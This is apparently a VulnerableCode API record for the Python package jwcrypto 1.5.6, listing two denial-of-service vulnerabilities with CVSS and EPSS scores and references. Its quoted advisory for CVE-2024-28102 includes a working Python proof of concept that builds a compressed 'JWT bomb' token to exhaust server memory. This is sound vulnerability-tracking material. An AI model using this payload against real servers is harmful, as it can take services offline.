Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/jwcrypto@1.5.6
Typepypi
Namespace
Namejwcrypto
Version1.5.6
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-9rtx-w9ry-rkcj
vulnerability_id VCID-9rtx-w9ry-rkcj
summary JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to 1.5.7, an unauthenticated attacker can exhaust server memory by sending crafted JWE tokens with ZIP compression. The existing patch for CVE-2024-28102 limits input token size to 250KB but does not validate the decompressed output size. An unauthenticated attacker can cause memory exhaustion on memory-constrained systems. A token under the 250KB input limit can decompress to approximately 100MB. This vulnerability is fixed in 1.5.7.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39373.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39373.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-39373
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.108
published_at 2026-04-08T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.10838
published_at 2026-04-12T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.1087
published_at 2026-04-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.10857
published_at 2026-04-09T12:55:00Z
4
value 0.00048
scoring_system epss
scoring_elements 0.14752
published_at 2026-04-13T12:55:00Z
5
value 0.00071
scoring_system epss
scoring_elements 0.21637
published_at 2026-04-21T12:55:00Z
6
value 0.00071
scoring_system epss
scoring_elements 0.21667
published_at 2026-04-18T12:55:00Z
7
value 0.00071
scoring_system epss
scoring_elements 0.21661
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-39373
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39373
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39373
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/latchset/jwcrypto
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/latchset/jwcrypto
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-39373
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-39373
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133006
reference_id 1133006
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133006
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2456187
reference_id 2456187
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2456187
8
reference_url https://github.com/advisories/GHSA-fjrm-76x2-c4q4
reference_id GHSA-fjrm-76x2-c4q4
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fjrm-76x2-c4q4
9
reference_url https://github.com/latchset/jwcrypto/security/advisories/GHSA-fjrm-76x2-c4q4
reference_id GHSA-fjrm-76x2-c4q4
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-07T20:22:50Z/
url https://github.com/latchset/jwcrypto/security/advisories/GHSA-fjrm-76x2-c4q4
fixed_packages
aliases CVE-2026-39373, GHSA-fjrm-76x2-c4q4
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9rtx-w9ry-rkcj
Fixing_vulnerabilities
0
url VCID-ygj7-qwt8-sud5
vulnerability_id VCID-ygj7-qwt8-sud5
summary 
JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5

## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.

## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)
```
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">



## Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

## References
[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
reference_id
reference_type
scores
0
value 0.0036
scoring_system epss
scoring_elements 0.5822
published_at 2026-04-21T12:55:00Z
1
value 0.00381
scoring_system epss
scoring_elements 0.59567
published_at 2026-04-11T12:55:00Z
2
value 0.00381
scoring_system epss
scoring_elements 0.59485
published_at 2026-04-07T12:55:00Z
3
value 0.00381
scoring_system epss
scoring_elements 0.59518
published_at 2026-04-04T12:55:00Z
4
value 0.00381
scoring_system epss
scoring_elements 0.59493
published_at 2026-04-02T12:55:00Z
5
value 0.00381
scoring_system epss
scoring_elements 0.59532
published_at 2026-04-13T12:55:00Z
6
value 0.00381
scoring_system epss
scoring_elements 0.59552
published_at 2026-04-12T12:55:00Z
7
value 0.00381
scoring_system epss
scoring_elements 0.59548
published_at 2026-04-09T12:55:00Z
8
value 0.00381
scoring_system epss
scoring_elements 0.59536
published_at 2026-04-08T12:55:00Z
9
value 0.00392
scoring_system epss
scoring_elements 0.60219
published_at 2026-04-16T12:55:00Z
10
value 0.00392
scoring_system epss
scoring_elements 0.60226
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/latchset/jwcrypto
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/latchset/jwcrypto
5
reference_url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
6
reference_url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
7
reference_url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
9
reference_url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
reference_id 1065688
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
reference_id 2268758
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2268758
12
reference_url https://github.com/advisories/GHSA-j857-7rvv-vj97
reference_id GHSA-j857-7rvv-vj97
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j857-7rvv-vj97
13
reference_url https://access.redhat.com/errata/RHSA-2024:2559
reference_id RHSA-2024:2559
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:2559
14
reference_url https://access.redhat.com/errata/RHSA-2024:4522
reference_id RHSA-2024:4522
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4522
fixed_packages
0
url pkg:pypi/jwcrypto@1.5.6
purl pkg:pypi/jwcrypto@1.5.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-9rtx-w9ry-rkcj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.6
aliases CVE-2024-28102, GHSA-j857-7rvv-vj97
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ygj7-qwt8-sud5
Risk_score3.4
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/jwcrypto@1.5.6